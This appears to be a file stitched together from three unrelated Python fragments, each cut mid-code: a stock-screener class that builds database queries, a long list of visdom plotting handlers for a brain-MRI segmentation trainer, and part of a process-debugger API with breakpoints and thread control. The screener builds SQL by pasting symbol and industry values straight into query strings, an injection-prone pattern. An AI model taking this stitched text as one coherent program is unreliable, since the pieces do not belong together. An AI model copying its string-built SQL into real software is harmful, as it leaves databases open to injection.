result = dataframe[timeframe]['close']
result.values[:] = 0
return (k + function[i:], result)
errorMessage = f'{name} is undefined in ta_mapping'
logger.error(errorMessage)
raise Exception(errorMessage)
def checkExpression(self, expression):
logger.debug('expression: ' + expression)
#start = timer()
statements = self.__separate(expression)
if len(statements) > 0:
translation = {}
for statement in statements:
logger.debug('statement: ' + statement)
translation[statement] = self.__translate(statement)
logger.debug('translated: ' + str(translation[statement]))
#end = timer()
#logger.debug(f'translation done in {str(100*(end-start))} ms')
timeframes = self.getTimeframes(translation)
symbol = 'SPY' #['FSZ-DBA.TO', 204] #this is a test case for exception
#start = timer()
result = MyScreener.sceener(symbol, expression, timeframes, translation)
#end = timer()
#logger.debug(f'got result in {str(100*(end-start))} ms')
#if len(translation) == 1 and list(translation.values())[0][0] in [7, 8]:
# logger.debug(result)
#else:
# result = result is not None
# logger.debug(f'result: {str(result)}')
return translation
def getTimeframes(self, translationMap):
timeframes = {}
for translation in translationMap.values():
if translation[0] == 99:
duration = translation[-1]
if duration is None:
duration = 1
if translation[1] not in timeframes:
timeframes[translation[1]] = duration
elif duration > timeframes[translation[1]]:
timeframes[translation[1]] = duration
elif translation[0] in [7, 8]:
if translation[2][0] not in timeframes:
timeframes[translation[2][0]] = translation[2][-1]
elif translation[2][-1] > timeframes[translation[2][0]]:
timeframes[translation[2][0]] = translation[2][-1]
else:
if translation[1][0] not in timeframes:
timeframes[translation[1][0]] = translation[1][-1]
elif translation[1][-1] > timeframes[translation[1][0]]:
timeframes[translation[1][0]] = translation[1][-1]
if len(translation) > 3:
if translation[0] == 2 and type(translation[2]) is list:
if translation[2][0] not in timeframes:
timeframes[translation[2][0]] = translation[2][-1]
elif translation[2][-1] > timeframes[translation[2][0]]:
timeframes[translation[2][0]] = translation[2][-1]
if type(translation[3]) is list:
if translation[3][0] not in timeframes:
timeframes[translation[3][0]] = translation[3][-1]
elif translation[3][-1] > timeframes[translation[3][0]]:
timeframes[translation[3][0]] = translation[3][-1]
return timeframes
def __getAllSymbols(self):
price = None
if self._priceType is not None and (self._priceLow is not None or self._priceHigh is not None):
if self._priceType == 0:
price = 'lastDayPrice'
elif self._priceType == 1:
price = 'avg30DayPrice'
elif self._priceType == 2:
price = 'avg60DayPrice'
elif self._priceType == 3:
price = 'avg90DayPrice'
volume = None
if self._volumeType is not None and (self._volumeLow is not None or self._volumeHigh is not None):
if self._volumeType == 0:
volume = 'lastDayVolume'
elif self._volumeType == 1:
volume = 'avg30DayVolume'
elif self._volumeType == 2:
volume = 'avg60DayVolume'
elif self._volumeType == 3:
volume = 'avg90DayVolume'
lastDate = (datetime.today() - timedelta(days=4)).strftime(utils.date_format) #take into account weekend and holidays
query = f"SELECT ticker FROM symbols WHERE active=1 and lastDate >= '{lastDate}'" #only consider symbols that are active and have price up to date
if self._symbols is not None:
query += " and ticker in (" + ', '.join(["'%s'" %symbol for symbol in self._symbols]) + ")"
if price is not None:
if self._priceLow is not None:
query += " and " + price + ">=" + str(self._priceLow)
if self._priceHigh is not None:
query += " and " + price + "<=" + str(self._priceHigh)
if volume is not None:
if self._volumeLow is not None:
query += " and " + volume + ">=" + str(self._volumeLow)
if self._volumeHigh is not None:
query += " and " + volume + "<=" + str(self._volumeHigh)
if self._industries is not None:
query += " and industry in (" + ', '.join(["'%s'" %industry for industry in self._industries.split()]) + ")"
#logger.info(query)
with contextlib.closing(utils.engine.raw_connection()) as conn:
cursor = conn.cursor()
cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
return [row[0] for row in rows]
def getMatchingSymbols(self):
logger.info('screener_id = ' + str(self._id))
if self._translation is None or len(self._translation) == 0:
if self._expression is None or len(self._expression) == 0:
logger.info('missing expression')
return
logger.info('new expression to translate: ' + self._expression)
statements = self.__separate(self._expression)
if len(statements) == 0:
logger.info('no valid statement')
return
translation = {}
for statement in statements:
translation[statement] = self.__translate(statement)
logger.debug('translation: ' + str(translation))
if len(translation) == 0:
logger.info('no valid translation')
return
replaceTranslation(self._id, translation)
self._translation = translation
matchingSymbols = []
symbols = self.__getAllSymbols()
logger.info(f'#symbols: {str(len(symbols))}')
if len(symbols) == 0:
return matchingSymbols
isTop = False
isBottom = False
translationValue = None
if len(self._translation) == 1:
translationValue = list(self._translation.values())[0]
if translationValue[0] == 7:
isTop = True
if translationValue[0] == 8:
isBottom = True
if (isTop or isBottom) and type(translationValue[2]) is str: #IBDRS
query = "SELECT ticker FROM symbols WHERE active=1 and ticker in ({}) order by ibdRelativeStrength {} limit {}" \
.format(','.join([f"'{symbol}'" for symbol in symbols]), 'desc' if isTop else 'asc', translationValue[1])
with contextlib.closing(utils.engine.raw_connection()) as conn:
cursor = conn.cursor()
cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
matchingSymbols = [row[0] for row in rows]
logger.info(f'#matchingSymbols: {str(len(matchingSymbols))}')
return matchingSymbols
timeframes = self.getTimeframes(self._translation)
"""
#do in single process
for symbol in symbols:
result = MyScreener.sceener(symbol, self._expression, timeframes, self._translation)
if result is not None:
matchingSymbols.append(result)
"""
#do with multiprocessing
if __name__ == '__main__':
parameters = [(symbol, self._expression, timeframes, self._translation) for symbol in symbols]
processes = mp.cpu_count() #this process is mainly cpu bound
with mp.Pool(processes=processes) as pool:
results = pool.starmap(MyScreener.sceener, parameters)
if isTop:
results = dict((key,d[key]) for d in results for key in d)
matchingSymbols = heapq.nlargest(int(translationValue[1]), results, key=results.get)
elif isBottom:
results = dict((key,d[key]) for d in results for key in d)
matchingSymbols = heapq.nsmallest(int(translationValue[1]), results, key=results.get)
else:
for result in results:
if result is not None:
matchingSymbols.append(result)
logger.info(f'#matchingSymbols: {str(len(matchingSymbols))}')
return matchingSymbols
def isBlank(myString):
if myString and myString.strip():
#myString is not None AND myString is not empty or blank
return False
#myString is None OR myString is empty or blank
return True
def getOffset(text, timeframe):
if len(text) | |
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "iSEG Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "iSEG Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "MRBrainS Confusion Matrix", PlotType.HEATMAP_PLOT,
params={"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "MRBrainS Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "ABIDE Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "ABIDE Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Runtime", PlotType.TEXT_PLOT,
params={"opts": {"title": "Runtime"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger, "Jensen-Shannon Divergence", every=1,
params={"title": "Jensen-Shannon Divergence on test data per Epoch",
"legend": ["Inputs", "Normalized"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Hausdorff Distance per class per epoch on reconstructed iSEG image",
every=1,
params={
"title": "Hausdorff Distance per class per epoch on reconstructed iSEG image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Hausdorff Distance per class per epoch on reconstructed MRBrainS image",
every=1,
params={
"title": "Hausdorff Distance per class per epoch on reconstructed MRBrainS image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Hausdorff Distance per class per epoch on reconstructed ABIDE image",
every=1,
params={
"title": "Hausdorff Distance per class per epoch on reconstructed ABIDE image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger, "Dice score per class per epoch", every=1,
params={"title": "Dice score on test patches per class per epoch",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Dice score per class per epoch on reconstructed iSEG image",
every=1,
params={
"title": "Dice score per class per epoch on reconstructed iSEG image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Dice score per class per epoch on reconstructed MRBrainS image", every=1,
params={
"title": "Dice score per class per epoch on reconstructed MRBrainS image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger,
"Dice score per class per epoch on reconstructed ABIDE image",
every=1,
params={
"title": "Dice score per class per epoch on reconstructed ABIDE image",
"legend": ["CSF", "GM", "WM"]}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input T2 iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input T2 iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Normalized iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Normalized iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Segmented iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Segmented iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Ground Truth iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Initial Noise iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Initial Noise iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented iSEG After Normalization",
PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented iSEG After Normalization"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented Input iSEG Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented Input iSEG Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input T2 MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input T2 MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Normalized MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Normalized MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Segmented MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Segmented MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Ground Truth MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Initial Noise MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Initial Noise MRBrainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented MRBrainS After Normalization",
PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented MRBrainS After Normalization"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Augmented Input MRBrainS Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Augmented Input MRBainS Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Input ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Input ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Normalized ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Normalized ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Ground Truth ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Ground Truth ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Segmented ABIDE Image", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True,
"title": "Reconstructed Segmented ABIDE Image"}},
every=10), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomLinePlotWithLegend(visdom_logger, "Per Dataset Mean Hausdorff Distance", every=1,
params={"title": "Per Dataset Mean Hausdorff Distance",
"legend": list(dataset_configs.keys())}), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Per-Dataset Histograms", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Reconstructed Images Histograms", PlotType.IMAGE_PLOT,
params={"opts": {"store_history": True}}, every=5), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
Checkpoint(save_folder, monitor_fn=lambda model_trainer: model_trainer.valid_loss, delta=0.01,
mode=MonitorMode.MIN), Event.ON_EPOCH_END) \
.with_event_handler(PlotAvgGradientPerLayer(visdom_logger, every=25), Event.ON_TRAIN_BATCH_END)
return trainer
elif self._trainer == TrainerType.UNET:
trainer = UNetTrainer(training_config, model_trainers, dataloaders[0], dataloaders[1], dataloaders[2],
reconstruction_datasets, input_reconstructor,
segmentation_reconstructor, augmented_input_reconstructor, gt_reconstructor,
run_config, dataset_configs, save_folder) \
.with_event_handler(PrintTrainingStatus(every=25), Event.ON_BATCH_END) \
.with_event_handler(PrintMonitorsTable(every=25), Event.ON_BATCH_END) \
.with_event_handler(PlotMonitors(visdom_logger), Event.ON_EPOCH_END) \
.with_event_handler(PlotLR(visdom_logger), Event.ON_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Training Input Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Training Input Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Validation Input Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Input Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Test Input Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Input Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Training Segmented Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Segmented Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Validation Segmented Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Segmented Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Test Segmented Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Segmented Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Training Segmentation Ground Truth Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Training Ground Truth Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Validation Segmentation Ground Truth Batch Process {}".format(
run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Ground Truth Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Test Segmentation Ground Truth Batch Process {}".format(
run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Ground Truth Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Training Label Map Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Training Label Map Patches Process {}".format(
run_config.local_rank)}},
every=500), Event.ON_TRAIN_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Validation Label Map Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Validation Label Map Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_VALID_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger,
"Test Label Map Batch Process {}".format(run_config.local_rank),
PlotType.IMAGES_PLOT,
params={"nrow": 4,
"opts": {"store_history": True,
"title": "Test Label Map Patches Process {}".format(
run_config.local_rank)}},
every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={
"opts": {"title": "Inputs Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "Background Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "Background Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "CSF Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "CSF Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "GM Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "GM Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "WM Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "WM Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Mean Hausdorff Distance", PlotType.LINE_PLOT,
params={"opts": {"title": "Mean Hausdorff Distance",
"legend": ["Test"]}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Metric Table", PlotType.TEXT_PLOT,
params={"opts": {"title": "Metric Table"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Per-Dataset Metric Table", PlotType.TEXT_PLOT,
params={"opts": {"title": "Per-Dataset Metric Table"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "iSEG Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "iSEG Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "MRBrainS Confusion Matrix", PlotType.HEATMAP_PLOT,
params={"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", | |
method on return'd breakpoint objects as they may be remote
and would then be *coppies* of the bp objects. (use the trace's
setBreakpointCode() instead).
"""
return self.bpbyid.get(id)
def getBreakpointByAddr(self, va):
'''
Return the breakpoint object (or None) for a given virtual address.
'''
return self.breakpoints.get(va)
def getBreakpoints(self):
"""
Return a list of the current breakpoints.
"""
return self.bpbyid.values()
def getBreakpointEnabled(self, bpid):
"""
An accessor method for returning if a breakpoint is
currently enabled.
NOTE: code which wants to be remote-safe should use this
"""
bp = self.getBreakpoint(bpid)
if bp is None:
raise Exception("Breakpoint %d Not Found" % bpid)
return bp.isEnabled()
def setBreakpointEnabled(self, bpid, enabled=True):
"""
An accessor method for setting a breakpoint enabled/disabled.
NOTE: code which wants to be remote-safe should use this
"""
bp = self.getBreakpoint(bpid)
if bp is None:
raise Exception("Breakpoint %d Not Found" % bpid)
if not enabled: # To catch the "disable" of fastbreaks...
bp.deactivate(self)
return bp.setEnabled(enabled)
def setBreakpointCode(self, bpid, pystr):
"""
Because breakpoints are potentially on the remote debugger
and code is not pickleable in python, special access methods
which takes strings of python code are necessary for the
vdb interface to quick script breakpoint code. Use this method
to set the python code for this breakpoint.
"""
bp = self.getBreakpoint(bpid)
if bp is None:
raise Exception("Breakpoint %d Not Found" % bpid)
bp.setBreakpointCode(pystr)
def getBreakpointCode(self, bpid):
"""
Return the python string of user specified code that will run
when this breakpoint is hit.
"""
bp = self.getBreakpoint(bpid)
if bp is not None:
return bp.getBreakpointCode()
return None
def call(self, address, args, convention=None):
"""
Setup the "stack" and call the target address with the following
arguments. If the argument is a string or a buffer, copy that into
memory and hand in the argument.
The current state of ALL registers are returned as a dictionary at the
end of the call...
Additionally, a "convention" string may be specified that the underlying
platform may be able to interpret...
"""
self.requireNotRunning()
return self.platformCall(address, args, convention)
def registerNotifier(self, event, notifier):
"""
Register a notifier who will be called for various
events. See NOTIFY_* constants for handler hooks.
"""
nlist = self.notifiers.get(event, None)
if nlist:
nlist.append(notifier)
else:
nlist = []
nlist.append(notifier)
self.notifiers[event] = nlist
def deregisterNotifier(self, event, notifier):
nlist = self.notifiers.get(event, [])
if notifier in nlist:
nlist.remove(notifier)
def getNotifiers(self, event):
return self.notifiers.get(event, [])
def requireNotExited(self):
'''
Call in a method that requires the trace to have not exited.
'''
if self.exited:
raise Exception('ERROR - Request invalid for trace which exited')
def requireNotRunning(self):
'''
Call in a method that requires the debugger the be attached and not
running.
'''
self.requireAttached()
if self.isRunning():
raise Exception('ERROR - trace is running; use "break" before running the specified command')
def requireAttached(self):
'''
Call in a method that requires the debugger to be attached.
'''
if not self.attached:
raise Exception('ERROR - attach to a process first')
def getFds(self):
"""
Get a list of (fd, type, bestname) pairs. This is MOSTLY useful
for HUMON consumtion... or giving HUMONs consumption...
"""
self.requireNotRunning()
if not self.fds:
self.fds = self.platformGetFds()
return self.fds
def getMemoryMaps(self):
"""
Return a list of the currently mapped memory for the target
process. This is acomplished by calling the platform's
platformGetMaps() mixin method. This will also cache the
results until CONTINUE. The format is (addr, len, perms, file).
"""
self.requireNotRunning()
if not self.mapcache:
self.mapcache = self.platformGetMaps()
return self.mapcache
def getMemoryFault(self):
'''
If the most receent event is a memory access error, this API will
return a tuple of (<addr>, <perm>) on supported platforms. Otherwise,
a (None, None) will result.
Example:
import envi.memory as e_mem
vaddr, vperm = trace.getMemoryFault()
if vaddr is not None:
print('Memory Fault At: 0x%.8x (perm: %d)' % (vaddr, vperm))
'''
return self.platformGetMemFault()
def isAttached(self):
'''
Return true or false if this trace's target processing is attached.
'''
return self.attached
def isRunning(self):
'''
Return true or false if this trace's target process is running.
'''
return self.running
def hasExited(self):
'''
Return true or false if this trace's target process has exited.
'''
return self.exited
def isRemote(self):
'''
Return true or false if this trace's target process is a CobraProxy
object to a trace on another system.
'''
return False
def enableAutoContinue(self, event):
"""
Put the tracer object in to AutoContinue mode
for the specified event. To make all events
continue running see RunForever mode in setMode().
"""
if event not in self.auto_continue:
self.auto_continue.append(event)
def disableAutoContinue(self, event):
"""
Disable Auto Continue for the specified
event.
"""
if event in self.auto_continue:
self.auto_continue.remove(event)
def getAutoContinueList(self):
"""
Retrieve the list of vtrace notification events
that will be auto-continued.
"""
return list(self.auto_continue)
def parseExpression(self, expression):
"""
Parse a python expression with many useful helpers mapped
into the execution namespace.
Example: trace.parseExpression("ispoi(ecx+ntdll.RtlAllocateHeap)")
"""
locs = VtraceExpressionLocals(self)
return long(e_expr.evaluate(expression, locs))
def sendBreak(self):
"""
Send an asynchronous break signal to the target process.
This is only valid if the target is actually running...
"""
self.requireAttached()
self.setMode("RunForever", False)
self.setMeta("ShouldBreak", True)
self.platformSendBreak()
time.sleep(0.01)
# If we're non-blocking, we gotta wait...
if self.getMode("NonBlocking", True):
while self.isRunning():
time.sleep(0.01)
def getStackTrace(self):
"""
Returns a list of (instruction pointer, stack frame) tuples.
If stack tracing results in an error, the error entry will
be (-1, -1). Otherwise most platforms end up with 0, 0 as
the top stack frame
"""
# FIXME thread id argument!
return self.archGetStackTrace()
def getThreads(self):
"""
Get a dictionary of <threadid>:<tinfo> pairs where
tinfo is platform dependant, but is typically either
the top of the stack for that thread, or the TEB on
win32
"""
if not self.threadcache:
self.threadcache = self.platformGetThreads()
return self.threadcache
def getCurrentThread(self):
'''
Return the thread id of the currently selected thread.
'''
return self.getMeta('ThreadId')
def selectThread(self, threadid):
"""
Set the "current thread" context to the given thread id.
(For example stack traces and register values will depend
on the current thread context). By default the thread
responsible for an "interesting event" is selected.
"""
if threadid not in self.getThreads():
raise Exception("ERROR: Invalid threadid chosen: %d" % threadid)
self.requireNotRunning()
self.platformSelectThread(threadid)
self.setMeta("ThreadId", threadid)
def isThreadSuspended(self, threadid):
"""
Used to determine if a thread is suspended.
"""
return self.sus_threads.get(threadid, False)
def suspendThread(self, threadid):
"""
Suspend a thread by ID. This will mean that on continuing
the trace, the suspended thread will not be scheduled.
"""
self.requireNotRunning()
if self.sus_threads.get(threadid):
raise Exception("The specified thread is already suspended")
if threadid not in self.getThreads().keys():
raise Exception("There is no thread %d!" % threadid)
self.platformSuspendThread(threadid)
self.sus_threads[threadid] = True
def resumeThread(self, threadid):
"""
Resume a suspended thread.
"""
self.requireNotRunning()
if not self.sus_threads.get(threadid):
raise Exception("The specified thread is not suspended")
self.platformResumeThread(threadid)
self.sus_threads.pop(threadid)
def injectThread(self, pc):
"""
Create a new thread inside the target process. This thread
will begin execution on the next process run().
"""
self.requireNotRunning()
#self.platformInjectThread(pc)
pass
def joinThread(self, threadid):
'''
Run the trace in a loop until the specified thread exits.
'''
self.setMode('RunForever', True)
self._join_thread = threadid
# Temporarily make run/wait blocking
nb = self.getMode('NonBlocking')
self.setMode('NonBlocking', False)
self.run()
self.setMode('NonBlocking', nb)
def getStructNames(self, namespace=None):
'''
This method returns either the structure names, or
the structure namespaces that the target tracer is aware
of. If "namespace" is specified, it is structures within
that namespace, otherwise it is "known namespaces"
Example: namespaces = trace.getStructNames()
ntdll_structs = trace.getStructNames(namespace='ntdll')
'''
if namespace:
return self.vsbuilder.getVStructNames(namespace=namespace)
return self.vsbuilder.getVStructNamespaceNames()
def getStruct(self, sname, va=None):
"""
Retrieve a vstruct structure optionally populated with memory from
the specified address. Returns a standard vstruct object.
"""
# Check if we need to parse symbols for a library
libbase = sname.split('.')[0]
self._loadBinaryNorm(libbase)
if self.vsbuilder.hasVStructNamespace(libbase):
vs = self.vsbuilder.buildVStruct(sname)
# FIXME this is deprecated and should die...
else:
vs = vstruct.getStructure(sname)
if vs is None:
return None
if va is None:
return vs
